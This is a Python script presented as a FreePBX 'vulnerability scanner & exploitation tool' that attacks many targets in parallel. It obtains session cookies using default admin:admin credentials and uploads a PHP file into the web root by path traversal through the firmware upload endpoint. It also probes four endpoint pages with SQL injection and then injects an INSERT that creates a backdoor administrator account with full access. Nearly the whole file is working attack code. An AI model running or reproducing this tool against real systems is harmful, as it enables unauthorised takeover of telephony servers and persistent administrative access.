#!/usr/bin/env python3 """ FreePBX Vulnerability Scanner Supports PHPSESSID extraction, file upload, and SQL injection detection """ import argparse import sys import threading import requests import base64 from urllib.parse import urlparse, quote from typing import Optional, List import re import time from datetime import datetime # Disable SSL warnings requests.packages.urllib3.disable_warnings() def print_banner(): """Print ASCII art banner""" banner = """ ╔═══════════════════════════════════════════════════════════════════╗ ║ ║ ║ ███████╗██████╗ ███████╗███████╗██████╗ ██████╗ ██╗ ██╗ ║ ║ ██╔════╝██╔══██╗██╔════╝██╔════╝██╔══██╗██╔══██╗╚██╗██╔╝ ║ ║ █████╗ ██████╔╝█████╗ █████╗ ██████╔╝██████╔╝ ╚███╔╝ ║ ║ ██╔══╝ ██╔══██╗██╔══╝ ██╔══╝ ██╔═══╝ ██╔══██╗ ██╔██╗ ║ ║ ██║ ██║ ██║███████╗███████╗██║ ██████╔╝██╔╝ ██╗ ║ ║ ╚═╝ ╚═╝ ╚═╝╚══════╝╚══════╝╚═╝ ╚═════╝ ╚═╝ ╚═╝ ║ ║ ║ ║ Vulnerability Scanner & Exploitation Tool ║ ║ Version 1.0 | 2024 ║ ║ ║ ╚═══════════════════════════════════════════════════════════════════╝ """ print(banner) class VulnerabilityResult: """Store vulnerability check results""" def __init__(self, url: str): self.url = url self.phpsessid_obtained = False self.upload_success = False self.sql_injection_detected = False self.sql_injection_exploited = False self.timestamp = datetime.now().strftime("%Y-%m-%d %H:%M:%S") self.details = [] def add_detail(self, message: str): """Add detailed information""" self.details.append(message) def is_vulnerable(self) -> bool: """Check if any vulnerability was found""" return (self.phpsessid_obtained or self.upload_success or self.sql_injection_detected or self.sql_injection_exploited) def get_summary(self) -> str: """Get result summary""" status = [] if self.phpsessid_obtained: status.append("PHPSESSID") if self.upload_success: status.append("File Upload") if self.sql_injection_detected: status.append("SQL Injection Detected") if self.sql_injection_exploited: status.append("SQL Injection Exploited") if status: return f"VULNERABLE: {', '.join(status)}" else: return "NOT VULNERABLE" class FreePBXScanner: def __init__(self, debug: bool = False): self.debug = debug self.results = [] self.lock = threading.Lock() def log_debug(self, title: str, content: str): """Debug logging output""" if self.debug: print(f"\n{'='*60}") print(f"[DEBUG] {title}") print(f"{'='*60}") print(content) print(f"{'='*60}\n") def log_status(self, status: str, message: str): """Log status message with color coding""" colors = { 'SUCCESS': '\033[92m', # Green 'FAIL': '\033[91m', # Red 'INFO': '\033[94m', # Blue 'WARNING': '\033[93m', # Yellow 'VULN': '\033[95m' # Magenta } reset = '\033[0m' color = colors.get(status, '') print(f"{color}[{status}]{reset} {message}") def get_phpsessid(self, url: str, result: VulnerabilityResult) -> Optional[str]: """ Step 1: Extract PHPSESSID from session cookie """ target_url = f"{url}/admin/config.php" headers = { 'Referer': target_url, 'Authorization': 'Basic YWRtaW46YWRtaW4=', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36' } try: if self.debug: self.log_debug("Request Headers - PHPSESSID Extraction", f"URL: {target_url}\n" + "\n".join([f"{k}: {v}" for k, v in headers.items()])) response = requests.get( target_url, headers=headers, verify=False, timeout=10, allow_redirects=False ) if self.debug: response_headers = "\n".join([f"{k}: {v}" for k, v in response.headers.items()]) self.log_debug("Response Headers - PHPSESSID Extraction", response_headers) response_body = response.text.split('\n')[:10] self.log_debug("Response Body (first 10 lines)", "\n".join(response_body)) # Extract PHPSESSID from Set-Cookie header cookies = response.headers.get('Set-Cookie', '') match = re.search(r'PHPSESSID=([^;]+)', cookies) if match: phpsessid = match.group(1) self.log_status('SUCCESS', f'{url} - PHPSESSID obtained: {phpsessid}') result.phpsessid_obtained = True result.add_detail(f"PHPSESSID: {phpsessid}") return phpsessid else: self.log_status('FAIL', f'{url} - PHPSESSID not found') return None except Exception as e: self.log_status('FAIL', f'{url} - PHPSESSID extraction failed: {str(e)}') return None def upload_exploit(self, url: str, phpsessid: str, result: VulnerabilityResult) -> bool: """ Step 2: Attempt file upload exploit using PHPSESSID """ target_url = f"{url}/admin/ajax.php?module=endpoint&command=upload_cust_fw" boundary = "----geckoformboundaryccb9f95c9e4119dba1ec857b71f857d7" randomstring = "cghsiauyh%&&sad1" file = "text1.php" headers = { 'Referer': f"{url}/admin/config.php?display=endpoint&view=custfwupgrade", 'Authorization': 'Basic cmFuZG9tOnJhbmRvbQ==', 'Cookie': f'PHPSESSID={phpsessid};', 'Content-Type': f'multipart/form-data; boundary={boundary}', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36' } # Construct multipart/form-data request body body = ( f'------{boundary}\r\n' f'Content-Disposition: form-data; name="dzuuid"\r\n' f'\r\n' f'48069f49-c03e-4182-81f7-48e36622e0d3\r\n' f'------{boundary}\r\n' f'Content-Disposition: form-data; name="dzchunkindex"\r\n' f'\r\n' f'0\r\n' f'------{boundary}\r\n' f'Content-Disposition: form-data; name="dztotalfilesize"\r\n' f'\r\n' f'3292\r\n' f'------{boundary}\r\n' f'Content-Disposition: form-data; name="dzchunksize"\r\n' f'\r\n' f'2000000\r\n' f'------{boundary}\r\n' f'Content-Disposition: form-data; name="dztotalchunkcount"\r\n' f'\r\n' f'1\r\n' f'------{boundary}\r\n' f'Content-Disposition: form-data; name="dzchunkbyteoffset"\r\n' f'\r\n' f'0\r\n' f'------{boundary}\r\n' f'Content-Disposition: form-data; name="fwbrand"\r\n' f'\r\n' f'../../../var/www/html\r\n' f'------{boundary}\r\n' f'Content-Disposition: form-data; name="fwmodel"\r\n' f'\r\n' f'1\r\n' f'------{boundary}\r\n' f'Content-Disposition: form-data; name="fwversion"\r\n' f'\r\n' f'1\r\n' f'------{boundary}\r\n' f'Content-Disposition: form-data; name="file"; filename="{file}"\r\n' f'Content-Type: application/octet-stream\r\n' f'\r\n' f'\r\n' f'\r\n' f'\r\n' f'\r\n' f'------{boundary}\r\n--\r\n' ) try: if self.debug: self.log_debug("Request Headers - File Upload", f"URL: {target_url}\n" + "\n".join([f"{k}: {v}" for k, v in headers.items()])) self.log_debug("Request Body - File Upload", body) response = requests.post( target_url, headers=headers, data=body, verify=False, timeout=10 ) if self.debug: response_headers = "\n".join([f"{k}: {v}" for k, v in response.headers.items()]) self.log_debug("Response Headers - File Upload", response_headers) response_body = response.text.split('\n')[:10] self.log_debug("Response Body (first 10 lines)", "\n".join(response_body)) # Check if upload was successful if '{"status":true}' in response.text: self.log_status('SUCCESS', f'{url} - File uploaded successfully (Status: {response.status_code})') file_url = f"{url}/{file}" # Verify uploaded file headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36' } try: if self.debug: self.log_debug("Request Headers - Verify Upload", f"URL: {file_url}\n" + "\n".join([f"{k}: {v}" for k, v in headers.items()])) verify_response = requests.get( file_url, headers=headers, verify=False, timeout=10 ) if self.debug: response_headers = "\n".join([f"{k}: {v}" for k, v in verify_response.headers.items()]) self.log_debug("Response Headers - Verify Upload", response_headers) response_body = verify_response.text.split('\n')[:10] self.log_debug("Response Body (first 10 lines)", "\n".join(response_body)) if randomstring in verify_response.text: self.log_status('VULN', f'{url} - File upload VERIFIED and accessible at {file_url}') result.upload_success = True result.add_detail(f"Uploaded file: {file_url}") return True else: self.log_status('WARNING', f'{url} - File uploaded but verification failed') return False except Exception as e: self.log_status('FAIL', f'{url} - File verification failed: {str(e)}') return False else: self.log_status('FAIL', f'{url} - File upload failed (Status: {response.status_code})') return False except Exception as e: self.log_status('FAIL', f'{url} - Upload request failed: {str(e)}') return False def check_sql_injection(self, url: str, result: VulnerabilityResult, endpoint: str, payload: str, description: str) -> bool: """ Generic SQL injection detection Checks response for: Exception, SQLSTATE, syntax, endpoint """ headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0', 'Content-Type': 'application/x-www-form-urlencoded', 'Accept-Encoding': 'gzip', 'Authorization': 'Basic YWRtaW46YWRtaW4=' } try: if self.debug: self.log_debug(f"Request Headers - {description}", f"URL: {url}{endpoint}\n" + "\n".join([f"{k}: {v}" for k, v in headers.items()])) self.log_debug(f"Request Body - {description}", payload) response = requests.post( f"{url}{endpoint}", headers=headers, data=payload, verify=False, timeout=10 ) if self.debug: response_headers = "\n".join([f"{k}: {v}" for k, v in response.headers.items()]) self.log_debug(f"Response Headers - {description}", response_headers) response_body = response.text.split('\n')[:10] self.log_debug(f"Response Body (first 10 lines)", "\n".join(response_body)) # Check for SQL error indicators response_text = response.text.lower() keywords = ['exception', 'sqlstate', 'syntax', 'endpoint'] found_keywords = [kw for kw in keywords if kw in response_text] if found_keywords: self.log_status('VULN', f'{url} - SQL Injection detected in {description} (Keywords: {", ".join(found_keywords)})') result.sql_injection_detected = True result.add_detail(f"SQL Injection in {description}: {', '.join(found_keywords)}") return True else: self.log_status('INFO', f'{url} - No SQL injection detected in {description}') return False except Exception as e: self.log_status('FAIL', f'{url} - SQL injection check failed ({description}): {str(e)}') return False def test_all_sql_injections(self, url: str, result: VulnerabilityResult) -> bool: """ Test all SQL injection endpoints from the document """ self.log_status('INFO', f'{url} - Starting SQL injection tests...') any_vulnerable = False # Test 1: basestation endpoint endpoint1 = "/admin/config.php?display=endpoint&new=1&view=basestation" payload1 = "id=&name='AD&brand=Sangoma&template=sangoma_default&mac=aabbccddeeff&ac=&repeater1=&repeater2=&repeater3=&multicell=no&sync_chain_id=512&sync_time=60&sync_data_transport=multicast&primary_data_sync_ip=0.0.0.0&sync_debug_enable=0&action=save_basestation" if self.check_sql_injection(url, result, endpoint1, payload1, "Basestation"): any_vulnerable = True # Test 2: firmware endpoint endpoint2 = "/admin/config.php?display=endpoint&view=firmware&brand=aastra" payload2 = "brand='aastra&customfw=1&action=save_firmware&slot1=0.01&slot2=1.09" if self.check_sql_injection(url, result, endpoint2, payload2, "Firmware"): any_vulnerable = True # Test 3: basefile endpoint endpoint3 = "/admin/config.php?display=endpoint&view=basefile&template=test&brand=aastra&model=6865i" payload3 = "models%5B%5D='6865i&brand=aastra&id=&template=test&edited=&action=changeBasefile&OID=¶m=test&value=value" if self.check_sql_injection(url, result, endpoint3, payload3, "Basefile"): any_vulnerable = True # Test 4: customExt endpoint endpoint4 = "/admin/config.php?display=endpoint&view=customExt&new=1" payload4 = "id='" if self.check_sql_injection(url, result, endpoint4, payload4, "CustomExt"): any_vulnerable = True return any_vulnerable def exploit_sql_injection(self, url: str, result: VulnerabilityResult) -> bool: """ Exploit SQL injection vulnerability Execute malicious SQL INSERT operation """ target_url = f"{url}/admin/config.php?display=endpoint&view=customExt" headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0', 'Content-Type': 'application/x-www-form-urlencoded', 'Accept-Encoding': 'gzip', 'Authorization': 'Basic YWRtaW46YWRtaW4=' } # Prepare data username = "textuser" password = "J7t!qZ@4mX2$wK9u#bF1^pL6" sections = "*" # Convert to hexadecimal (with 0x prefix) hex_username = '0x' + username.encode('utf-8').hex() hex_password = '0x' + password.encode('utf-8').hex() hex_sections = '0x' + sections.encode('utf-8').hex() # Combine hex values hex_values = f"{hex_username},{hex_password},{hex_sections}" # Construct payload payload_raw = f"1';INSERT INTO ampusers (username, password_sha1, sections) VALUES ({hex_values})#" # URL encode payload payload_encoded = quote(payload_raw) # Construct request body request_body = f"id={payload_encoded}" try: if self.debug: print(f"\n[*] Encoding Process:") print(f" Username: {username}") print(f" Hex: {hex_username}") print(f" Password: {password}") print(f" Hex: {hex_password}") print(f" Sections: {sections}") print(f" Hex: {hex_sections}") print(f" Combined: {hex_values}") print(f" Raw payload: {payload_raw}") print(f" URL encoded: {payload_encoded}") self.log_debug("Request Headers - SQL Injection Exploit", f"URL: {target_url}\n" + "\n".join([f"{k}: {v}" for k, v in headers.items()])) self.log_debug("Request Body - SQL Injection Exploit", request_body) response = requests.post( target_url, headers=headers, data=request_body, verify=False, timeout=10 ) if self.debug: response_headers = "\n".join([f"{k}: {v}" for k, v in response.headers.items()]) self.log_debug("Response Headers - SQL Injection Exploit", response_headers) response_body = response.text.split('\n')[:10] self.log_debug("Response Body (first 10 lines)", "\n".join(response_body)) self.log_status('VULN', f'{url} - SQL injection exploited | Username: {username} | Password: {password}') result.sql_injection_exploited = True result.add_detail(f"Injected user: {username}, password: {password}") return True except Exception as e: self.log_status('FAIL', f'{url} - SQL injection exploitation failed: {str(e)}') return False def sql_injection_workflow(self, url: str, result: VulnerabilityResult) -> bool: """ Complete SQL injection workflow: 1. Test all SQL injection endpoints 2. If vulnerable, execute exploitation """ self.log_status('INFO', f'{url} - Starting SQL injection workflow') # Step 1: Test for SQL injection if self.test_all_sql_injections(url, result): self.log_status('SUCCESS', f'{url} - SQL injection vulnerability confirmed, proceeding to exploit...') # Step 2: Execute SQL injection exploit return self.exploit_sql_injection(url, result) else: self.log_status('INFO', f'{url} - No SQL injection vulnerabilities detected, skipping exploit') return False def process_url(self, url: str, mode: str = 'all'): """ Process a single URL """ # Ensure URL format is correct if not url.startswith(('http://', 'https://')): url = f'http://{url}' print(f"\n{'='*70}") self.log_status('INFO', f'Processing target: {url}') print(f"{'='*70}") result = VulnerabilityResult(url) if mode == 'all': # Execute complete exploitation workflow phpsessid = self.get_phpsessid(url, result) if phpsessid: self.upload_exploit(url, phpsessid, result) self.sql_injection_workflow(url, result) elif mode == 'upload': phpsessid = self.get_phpsessid(url, result) if phpsessid: self.upload_exploit(url, phpsessid, result) elif mode == 'sql': self.sql_injection_workflow(url, result) elif mode == 'auth': self.sql_injection_workflow(url, result) # Store result with self.lock: self.results.append(result) # Print summary for this URL print(f"\n{'-'*70}") print(f"Summary for {url}: {result.get_summary()}") print(f"{'-'*70}\n") def worker(self, urls: List[str], mode: str): """ Worker thread """ while urls: try: url = urls.pop(0) self.process_url(url, mode) except IndexError: break except Exception as e: self.log_status('FAIL', f'Thread error: {str(e)}') def run(self, urls: List[str], threads: int = 1, mode: str = 'all'): """ Execute main workflow """ print(f"\n[*] Starting scan") print(f"[*] Total targets: {len(urls)}") print(f"[*] Thread count: {threads}") print(f"[*] Scan mode: {mode.upper()}") print(f"[*] Timestamp: {datetime.now().strftime('%Y-%m-%d %H:%M:%S')}\n") if threads == 1: # Single-threaded mode for url in urls: self.process_url(url, mode) else: # Multi-threaded mode url_list = list(urls) thread_list = [] for i in range(min(threads, len(url_list))): t = threading.Thread(target=self.worker, args=(url_list, mode)) t.start() thread_list.append(t) for t in thread_list: t.join() vulnerable_count = sum(1 for r in self.results if r.is_vulnerable()) print(f"\n{'='*70}") print(f"[*] Scan completed") print(f"[*] Total scanned: {len(self.results)}") print(f"[*] Vulnerable: {vulnerable_count}") print(f"[*] Not vulnerable: {len(self.results) - vulnerable_count}") print(f"{'='*70}\n") def save_results(self, output_file: str): """ Save scan results to file """ try: with open(output_file, 'w', encoding='utf-8') as f: f.write("="*80 + "\n") f.write("FreePBX Vulnerability Scanner - Results Report\n") f.write(f"Generated: {datetime.now().strftime('%Y-%m-%d %H:%M:%S')}\n") f.write("="*80 + "\n\n") # Summary section vulnerable_results = [r for r in self.results if r.is_vulnerable()] f.write(f"SUMMARY\n") f.write(f"{'-'*80}\n") f.write(f"Total Scanned: {len(self.results)}\n") f.write(f"Vulnerable: {len(vulnerable_results)}\n") f.write(f"Not Vulnerable: {len(self.results) - len(vulnerable_results)}\n") f.write(f"\n") # Vulnerable targets section if vulnerable_results: f.write(f"VULNERABLE TARGETS\n") f.write(f"{'-'*80}\n\n") for result in vulnerable_results: f.write(f"URL: {result.url}\n") f.write(f"Timestamp: {result.timestamp}\n") f.write(f"Status: {result.get_summary()}\n") # Vulnerability details if result.phpsessid_obtained: f.write(f" [+] PHPSESSID Obtained: YES\n") if result.upload_success: f.write(f" [+] File Upload: SUCCESS\n") if result.sql_injection_detected: f.write(f" [+] SQL Injection: DETECTED\n") if result.sql_injection_exploited: f.write(f" [+] SQL Injection: EXPLOITED\n") # Additional details if result.details: f.write(f"\n Details:\n") for detail in result.details: f.write(f" - {detail}\n") f.write(f"\n{'-'*80}\n\n") # Non-vulnerable targets section safe_results = [r for r in self.results if not r.is_vulnerable()] if safe_results: f.write(f"NON-VULNERABLE TARGETS\n") f.write(f"{'-'*80}\n\n") for result in safe_results: f.write(f"URL: {result.url}\n") f.write(f"Timestamp: {result.timestamp}\n") f.write(f"Status: NOT VULNERABLE\n\n") self.log_status('SUCCESS', f'Results saved to: {output_file}') print(f"[*] Vulnerable targets: {len(vulnerable_results)}/{len(self.results)}") except Exception as e: self.log_status('FAIL', f'Failed to save results: {str(e)}') def main(): parser = argparse.ArgumentParser( description='FreePBX Vulnerability Scanner - Multi-mode exploitation tool', formatter_class=argparse.RawDescriptionHelpFormatter, epilog=""" Usage Examples: Single target: python3 freepbx_scanner.py -u http://10.2.21.156 Batch targets: python3 freepbx_scanner.py -l targets.txt -t 10 Debug mode: python3 freepbx_scanner.py -u http://10.2.21.156 -d Save results: python3 freepbx_scanner.py -l targets.txt -o results.txt SQL injection only: python3 freepbx_scanner.py -u http://10.2.21.156 --mode sql File upload only: python3 freepbx_scanner.py -u http://10.2.21.156 --mode upload Scan Modes: all - Run all checks (default) upload - File upload vulnerability only sql - SQL injection detection and exploitation auth - Authentication bypass (SQL injection) """ ) # Argument definitions parser.add_argument('-u', '--url', type=str, help='Single target URL') parser.add_argument('-l', '--list', type=str, help='File containing list of target URLs (one per line)') parser.add_argument('-t', '--threads', type=int, default=1, help='Number of threads (default: 1)') parser.add_argument('-o', '--output', type=str, help='Save results to output file') parser.add_argument('-d', '--debug', action='store_true', help='Enable debug mode (show headers, request/response bodies)') parser.add_argument('--mode', type=str, choices=['all', 'upload', 'sql', 'auth'], default='all', help='Scan mode: all (default), upload, sql, auth') args = parser.parse_args() # Print banner print_banner() # Argument validation if not args.url and not args.list: parser.print_help() sys.exit(1) # Collect target URLs urls = [] if args.url: urls.append(args.url) if args.list: try: with open(args.list, 'r', encoding='utf-8') as f: for line in f: line = line.strip() if line and not line.startswith('#'): urls.append(line) except Exception as e: print(f"[-] Failed to read file: {str(e)}") sys.exit(1) if not urls: print("[-] No valid target URLs found") sys.exit(1) # Create scanner instance scanner = FreePBXScanner(debug=args.debug) # Execute scan try: scanner.run(urls, threads=args.threads, mode=args.mode) except KeyboardInterrupt: print("\n[!] Scan interrupted by user") sys.exit(0) # Save results if output file specified if args.output: scanner.save_results(args.output) if __name__ == '__main__': main()